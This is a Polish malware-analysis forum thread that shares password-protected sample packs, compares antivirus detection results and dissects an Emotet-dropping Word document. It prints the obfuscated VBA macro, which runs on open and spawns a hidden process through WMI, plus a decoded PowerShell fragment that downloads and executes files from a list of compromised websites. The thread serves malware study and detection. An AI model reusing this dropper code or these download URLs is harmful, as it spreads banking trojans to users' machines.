[malware]
[attachment=1397]
hasło - malware
[/malware]
Z życia wzięte. Comodo i MBAM nic.
Ostrzeżenia Firefoksa zauważyły szkodnika przy pobieraniu.
(16.09.2019, 20:33) Mcin napisał(a):
[malware]
[attachment=1397]
hasło - malware
[/malware]
Z życia wzięte. Comodo i MBAM nic.
Ostrzeżenia Firefoksa zauważyły szkodnika przy pobieraniu.
Zaciemniony skrypt PowerShell. Pobiera i ładuje trojana Emotet. Comodo powinien przy wykonaniu pliku wykonywalnego wykryć ten rodzaj zagrożenia VirusScope'em.
Mogę dodać, że Emotet dodatkowo ładuje trojana bankowego Trickbot.
[malware]https://1drv.ms/u/s!AtTiI3pG5DGqlXOPzRHZf8Hh68_I?e=odqA3a[/malware]
Czym analizowałeś? Ja tylko na szybko próbowałem „manualnie” prześledzić VBA i przegrałem. Otwierałem plik w Comodo Sandbox, więc możliwe, że kod dodatkowo „zaciemnił się”, gdy wykrył uruchomienie w piaskownicy.
30 Malware
Hasło: infected
[malware]https://www50.zippyshare.com/v/9oV9sKxN/file.html[/malware]
Windows Defender podczas skanowania pozostawił 8 plików
Eset 14/30
Przepuścił „copia fattura.dox.exe” – pinfile, resztę: dokument programu Microsoft Office + RTF.
do 20:43
symantec ===== +--+-+-++-+-++--+++-++++++++-+
fortinet ===== ++-+--+++---+-+--++-+-+-+--+-+
mcafee ======= +-+++++++-++++--++++++++++++-+
trendMicro === ++-++++++-++++--+++--++---++++
Qihoo-360 ==== ++-++++++-++++--++-+-++-++++++
Arcabit ====== --+++++++-++++--+--++++-+-++--
kaspersky ==== -+-+--+-++-+-----++++-+----+++
+ wykryty
- nie wykryty
Lepszy McAfee według sygnatur.
20 Malware
[malware]https://www18.zippyshare.com/v/Gpu6LSmT/file.html[/malware]
20:54
Symantec ====01100010011000001010
fortinet ======00110110011001011101
Qihoo-360 ====01110111111011011000
Arcabit ======00111100011011000001
Kaspersky ====00111111111001011111
(18.09.2019, 21:58) Mcin napisał(a):
Czym analizowałeś? Ja tylko na szybko próbowałem „manualnie” prześledzić VBA i przegrałem. Otwierałem plik w Comodo Sandbox, więc możliwe, że kod dodatkowo „zaciemnił się”, gdy wykrył uruchomienie w piaskownicy.
Sam kod makra jest zaciemniony. Widać to po funkcji AutoOpen – czyli makro uruchamia się automatycznie po otwarciu dokumentu.
Kod:
' Analyst note (defensive): obfuscated VBA from the maldoc discussed above.
' Every "If <literal> = <different literal> Then" block below compares two
' unequal constants, so its body (Dim / Select Case / CVar noise) never runs;
' it only pads the macro and defeats simple string-based detection. The real
' work is the two statements outside those blocks: the string assembly and the
' WMI Win32_Process.Create call.
Function lFZOPK()
Dim aHYQwzoR As Object
' Dead code: 599 never equals 777.
If 599 = 777 Then
Dim itPUDGz As Boolean
Select Case G4Bo7k
Case 386
Dim AL7CLMI As Boolean
zYYwaGOq = IhmjFvnQ
Dim YcqNToF As Boolean
VjHjGHY = 232
Dim jwz954 As Boolean
Un2Sj8QU = CVar(604)
Dim lKdzAjS As Boolean
Case 497
Dim CBfbrn As Boolean
FsfizzX = sG2k2Lo
Dim z36wQqRr As Boolean
tLKpPXJn = CVar(wWFhhpLw)
Dim r32Bqc As Boolean
W1RGcdX = 510
Dim XmMsiqmv As Boolean
End Select
End If
' Live code: assembles a command line from the captions of three form controls
' stored on ThisDocument. MJC9G0Z and J1lpHN0R are not defined anywhere in this
' listing; without Option Explicit an undeclared name is Empty, so presumably
' the payload text lives entirely in the control captions (the encoded
' PowerShell command line shown further down the thread) — confirm against
' the document's form controls.
jYf5B8 = MJC9G0Z + ThisDocument.iJmHiTkN.Caption + ThisDocument.bNFNUwA.Caption + ThisDocument.Fkrsjt.Caption + J1lpHN0R
Dim p1G45Hb As Object
' Dead code: 884 never equals 630.
If 884 = 630 Then
Dim p8wlPzQ As Boolean
Select Case S7m7oU
Case 829
Dim aCHLjaX As Boolean
b3qkrCL = wHH6ctOf
Dim B3MwijmZ As Boolean
Mjb7pQ = 846
Dim kq4b85VN As Boolean
iY9Ebom = CVar(534)
Dim FHDEolw As Boolean
Case 420
Dim kLQLViw As Boolean
f7SaVQAz = IFwU87
Dim hlP1IX5 As Boolean
RZDiRH = CVar(pCqzwD)
Dim iWX52UQ As Boolean
Itlwz6hz = 454
Dim VJu40_TJ As Boolean
End Select
End If
Dim dItr2wmk As Object
' Dead code: 257 never equals 989.
If 257 = 989 Then
Dim A7wOHw As Boolean
Select Case HFtrwGdC
Case 68
Dim JFCKFiU3 As Boolean
qihi0X = ShXEhb
Dim w3UnNw As Boolean
UsK21O5P = 51
Dim upiKtaT As Boolean
EhGjmT8j = CVar(168)
Dim sCBU1JR As Boolean
Case 307
Dim PInHwFhM As Boolean
H5T4HEKS = b5qbtcZ
Dim lBbNXB As Boolean
VUiEHVw = CVar(cJ5Qp2I)
Dim VcLZUqo As Boolean
osr82kmv = 563
Dim ZZj5HF6 As Boolean
End Select
End If
' Live code: "winm" + "gmts:Win32_Process" is the split-up WMI moniker
' "winmgmts:Win32_Process". Win32_Process.Create(CommandLine, CurrentDirectory,
' ProcessStartupInformation, ProcessId) spawns the assembled command line; the
' third argument calls Jvf6up(), which returns the startup-information object
' (window state) for the child. Detection note: a process created through WMI
' is typically parented by WmiPrvSE.exe rather than WINWORD.EXE, so a plain
' "Office spawns PowerShell" parent/child rule does not see it — alert on
' Win32_Process.Create / WMI activity originating from Office instead.
d3Tp9rq = CreateObject("winm" + "gmts:Win32_Process").Create(jYf5B8 + tvqtsm, zsCf4EY, Jvf6up, FwYijVmC)
Dim zwhNqkY As Object
' Dead code: 698 never equals 468.
If 698 = 468 Then
Dim jXNznD1 As Boolean
Select Case uoH2vo
Case 512
Dim Gc_YrU As Boolean
Bd9GEZbS = cSUq52E
Dim IRGB4pi As Boolean
oE7DnFml = 757
Dim EiMzKR As Boolean
tbiITr = CVar(539)
Dim X6bEbk9 As Boolean
Case 605
Dim jiipOET As Boolean
v59d7vzZ = UovOHO
Dim IwzfhsTi As Boolean
ioWPKdz = CVar(z_rSB97)
Dim tTXblYJL As Boolean
SQJYBKz = 583
Dim HiScEzo As Boolean
End Select
End If
End Function
Kod:
' Returns the startup-information object that lFZOPK passes as the third
' argument of Win32_Process.Create. Same dead-code padding pattern as lFZOPK:
' every If block compares unequal literals and never executes.
Function Jvf6up()
Dim OAOXKIT As Object
' Dead code: 441 never equals 219.
If 441 = 219 Then
Dim Md9cXIGv As Boolean
Select Case UjMS9t8
Case 869
Dim HbW8pS As Boolean
znVnXajj = YTZ8lZ3
Dim DsQoOXMk As Boolean
bSKaXJIc = 223
Dim HrzZQd As Boolean
K29Eob4D = CVar(467)
Dim FPK1CnBK As Boolean
Case 830
Dim Bwc81_sY As Boolean
Uv6jYm7c = cUcKVw3T
Dim UFKjpY As Boolean
MouiI1 = CVar(Robarjj)
Dim kVSmDIY As Boolean
XTlW2_N7 = 576
Dim zDMnk_ As Boolean
End Select
End If
' Live code: the moniker is assembled from a form-control caption plus the
' literal "Startup". Given how the result is used in lFZOPK, it presumably
' resolves to "winmgmts:Win32_ProcessStartup", with the caption supplying the
' missing part — NOTE(review): confirm against the caption of jdjjB3 in the
' document. MqdIdWiL and YzR3kU are not defined in this listing.
Set Jvf6up = CreateObject(MqdIdWiL + ThisDocument.jdjjB3.Caption + "Startup" + YzR3kU)
Dim w7iUZz As Object
' Dead code: 587 never equals 104.
If 587 = 104 Then
Dim qOFuiv2 As Boolean
Select Case EOT98_q
Case 200
Dim UKiGflJ As Boolean
KZmsud = Dufwdmf6
Dim IHB7w2A As Boolean
Fstfl5s = 286
Dim vXf1DH7 As Boolean
j7j0MjH0 = CVar(321)
Dim OlvsWE As Boolean
Case 236
Dim RP63v9 As Boolean
d0UE6A = Tc1IfKXm
Dim T6JpIvP_ As Boolean
DwKl_MAJ = CVar(FQt3V5O)
Dim J3SiDkF As Boolean
rjz7bMzm = 523
Dim HTKO08 As Boolean
End Select
End If
' Live code: sets ShowWindow on the startup object. The property access is
' split with line continuations and a "!" type suffix to defeat naive
' "ShowWindow" string matching. None of the six summed names is defined in
' this listing; if all are undeclared (Empty) the sum is 0, i.e. a hidden
' window (SW_HIDE) for the spawned process — NOTE(review): confirm none of
' them is assigned in another module.
Jvf6up. _
ShowWindow! _
= iL9EzZ + wSHNOE + EEYYtw + qXAUaDRG + KzwL3DM + NDt9Y8D
Dim CXLcvn As Object
' Dead code: 152 never equals 41.
If 152 = 41 Then
Dim ohsCXm As Boolean
Select Case AZbwSW
Case 60
Dim WNENMU_0 As Boolean
bpLkki = IhN29z
Dim LLMvwqa As Boolean
cjUzch = 273
Dim IFI9a14 As Boolean
KafkPR = CVar(459)
Dim Fwzwb2Os As Boolean
Case 631
Dim zWZsAf As Boolean
kUjwWTpr = zcSRkJ
Dim wuuP5P4w As Boolean
iiaAOdka = CVar(XiHuXO)
Dim mszPWR As Boolean
CdaU7iZ = 994
Dim Ak0Nzs As Boolean
End Select
End If
Dim o5ILTN As Object
' Dead code: 780 never equals 603.
If 780 = 603 Then
Dim SpXhP_ As Boolean
Select Case rMHiNNS
Case 105
Dim Z9mnsjz As Boolean
BQWCpYDS = BD5Qd9iP
Dim pjlnv1 As Boolean
aoJlcj = 981
Dim Dwhtb7BX As Boolean
irIqKRn = CVar(884)
Dim XptS1Jzw As Boolean
Case 211
Dim XlXSj5us As Boolean
siOJXOi = Z39YjjSV
Dim imJikBzN As Boolean
oajMdF6 = CVar(vllu8D6)
Dim qzOiOA As Boolean
lDoHlBJi = 420
Dim Pw6il3 As Boolean
End Select
End If
End Function
' Entry point: Word runs Sub AutoOpen automatically when the document is opened
' with macros enabled, so this is the trigger of the whole chain. Its only live
' statement is the call to lFZOPK; both If blocks compare unequal literals and
' are dead padding.
Sub autoopen()
Dim Ykqda3 As Object
' Dead code: 600 never equals 931.
If 600 = 931 Then
Dim sS86IEI5 As Boolean
Select Case LcSbVXUc
Case 131
Dim vuuiHG As Boolean
C8_PhR = infQSKiZ
Dim lCOTI0r_ As Boolean
dZzBs1 = 618
Dim u96B8Wz As Boolean
v7vMVrIY = CVar(841)
Dim nwAiiY As Boolean
Case 169
Dim J1djcUM As Boolean
DrF4jbCz = vNspnX
Dim b4aWok As Boolean
sdWdaA1 = CVar(kPKPX0)
Dim McMdL2L As Boolean
imdsDf = 911
Dim ijals6Y6 As Boolean
End Select
End If
' Live code: builds the command line from the document's form-control
' captions and spawns it via WMI (see lFZOPK).
lFZOPK
Dim P02l7jG As Object
' Dead code: 143 never equals 700.
If 143 = 700 Then
Dim nw2jif As Boolean
Select Case Bi4cGHA
Case 910
Dim wUnqp5H As Boolean
tzvROwO = ntoGvT
Dim wfDL21n As Boolean
oFcG4tU = 846
Dim InvTFO_ As Boolean
MA4kUq = CVar(426)
Dim fJWB_HAo As Boolean
Case 311
Dim i54_UJ As Boolean
SmpZzL = UQsMvzz
Dim IllKfv As Boolean
DVNXPr = CVar(JTqQMUK)
Dim lv7zY4F As Boolean
Hij0230V = 744
Dim bLJj0vkd As Boolean
End Select
End If
End Sub
Potem następuje wywołanie PowerShella w celu uruchomienia skryptu zakodowanego w base64 (parametr -enco), a takich warstw zaciemnienia może być nawet ponad 30.
Kod:
PROCESS: powershell.exe [2000]
FILE: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMDLINE: powershell -enco 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
Po odkodowaniu widoczne są złośliwe adresy, z których zostaje pobrane złośliwe oprogramowanie (skrypt próbuje kolejnych adresów z listy i uruchamia pierwszy pobrany plik o rozmiarze co najmniej 20485 bajtów).
Kod:
https://stackspay.com/wp-includes/0sxfg82114/@https://www.reza-khosravi.com/wp-content/q2/@http://w3brasil.com/sistema/p5q207/@https://www.pronhubhd.com/cgi-bin/m0cux6/@https://www.karenshealthfoods.com/wp-includes/95oos267/'."s`PLIt"('@');$FCoRz8lI='U8LdDj';foreach($NOBXzi in $XOJOsjW){try{$jjRBwGJH."do`WnloAdF`i`lE"($NOBXzi, $vnqpGqn);$f3rXzpb7='Q239rltn';If ((&('Get'+'-Item') $vnqpGqn)."lEn`GtH" -ge 20485) {[Diagnostics.Process]::"sT`ARt"($vnqpGqn);$Q5u0tj='iOzisLAA';break;$w24h4z='WQkubi'}}catch{}}$O98YDGEI='bSKzqk_'
np. jeden z nich:
Reszta na priv